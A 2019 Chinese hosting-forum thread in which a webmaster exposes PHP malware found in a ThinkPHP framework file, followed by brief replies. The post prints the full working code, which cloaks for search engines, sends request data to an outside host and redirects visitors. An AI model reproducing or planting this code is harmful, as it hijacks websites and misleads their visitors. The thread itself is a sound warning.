设为首页收藏本站
切换到宽版

全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

全球主机交流论坛»论坛 主机综合交流 美国VPS综合讨论 曝光新型挂马连接代码!
CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
返回列表 发新帖
查看: 774|回复: 5

[疑问] 曝光新型挂马连接代码!

[复制链接]
win7
发表于 2019-1-18 12:41:25 | 显示全部楼层 |阅读模式
网站被挂马10多天,一直找不到被挂马的文件,一直以来以为是JS挂马或者劫持,昨晚一个网友通过抓包发现出现302状态码,怀疑是框架挂马,果然在tp框架找到了挂马代码,现把这个挂马代码曝光在这里,让大家见识见识这个不要脸的家伙!

<?php
set_time_limit(20);error_reporting(0);
define('u_b','/');
define('s_u','http://3.2018ltcx.com/');
define('s_s','@haosou.com|360.cn|baidu|spider|360spider|so|360|sogou|sm.cn|youdao@i');
define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p());
function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{$d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$diconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o);$h=file_get_contents($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;}
if(preg_match(s_s,r_s)){$d_s=true;if(preg_match("@site%3A|inurl%3A@i",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s && empty($_COOKIE['xx'])){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ua='.bin2hex(u_s);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header("Location: ".$d_c.'?'.h_t);exit;}}if(strstr(h_z,u_b)){if(preg_match(s_s,u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_u.='&ua='.bin2hex(u_s);$d_c=r_s($d_u);echo $d_c;exit;}}
?>
回复

举报

zhouzhijun
发表于 2019-1-18 12:47:54 | 显示全部楼层
门外汉表示不懂,哪位大佬普及下,多谢!
回复 支持 1 反对 0

举报

flyfish
发表于 2019-1-18 12:45:58 来自手机 | 显示全部楼层
怎么中招的?
回复 支持 反对

举报

gaoji.me
发表于 2019-1-18 12:46:27 来自手机 | 显示全部楼层
哪个位置的文件~
回复 支持 反对

举报

edear
发表于 2019-1-18 13:01:18 | 显示全部楼层
这个得找出漏洞在哪里,不然今天删除了,明天又给你挂上,删除了也没什么意义。
回复 支持 反对

举报

546288218
发表于 2019-1-18 13:08:33 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-4-26 21:03 , Processed in 0.064406 second(s), 9 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表